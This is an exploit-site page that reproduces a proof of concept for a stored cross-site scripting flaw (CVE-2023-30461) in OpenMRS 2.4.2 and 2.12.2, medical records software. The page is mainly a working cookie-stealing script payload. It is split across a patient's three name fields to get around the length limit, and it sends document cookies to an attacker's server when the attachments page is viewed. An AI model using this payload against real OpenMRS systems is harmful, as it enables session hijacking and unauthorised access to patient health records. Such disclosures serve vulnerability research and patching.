Advertisement






OpenMRS V2.4.2, 2.12.2 Stored XSS Vulnerabiltiy

CVE Category Price Severity
CVE-2023-30461 CWE-79 Not disclosed High
Author Risk Exploitation Type Date
Not disclosed High Remote 2023-04-10
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040047

Below is a copy:

OpenMRS V2.4.2, 2.12.2 Stored XSS Vulnerabiltiy
# Exploit Title: OpenMRS XSS Vulnerability in Attachments
# Date: 2023-04-09
# Exploit Author: Omar Tsai
# Vendor Homepage: https://openmrs.org/
# Software Link: https://openmrs.org/download/
# Version: 2.4.2, 2.12.2
# Tested on: OpenMRS 2.4.2, 2.12.2 Standalone
# CVE : CVE-2023-30461

# Proof-of-concept for XSS OpenMRS 2.4.2, 2.12,2

In this example, I will demonstrate a simple cookie-stealing attack using the three fields in a patient (First name, Middle name, and Last name).

## 1. Figure out the XSS payload

```sh
<script>$.get(`https://<my_server>/?`+document.cookie);</script>
```

Now we have to split this into 50-character limited chunks since each name field is limited to 50 characters only. Note that the backtick is needed for quotes since quotations are escaped in the field.

## 2. Split up the XSS payload into 3 parts

I will split the payload into 3 parts using a variable and the final jquery request:

**For the first name:**

```sh
<script>var a=`https://my-own`</script>
```

**For the middle name:**

```sh
<script>a+=`-simpledomain.cp,/?`</script>
```

**For the last name:**

```sh
<script>$.get(a+document.cookie);</script>
```

## 3. Save the patient information

Just click save

## 4. Execute XSS attack

The XSS attack can be triggered by going to the `attachments` page of the patient.

## 5. Get cookies

If you look back at your server logs, a GET request will have been initiated with the user's cookies

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.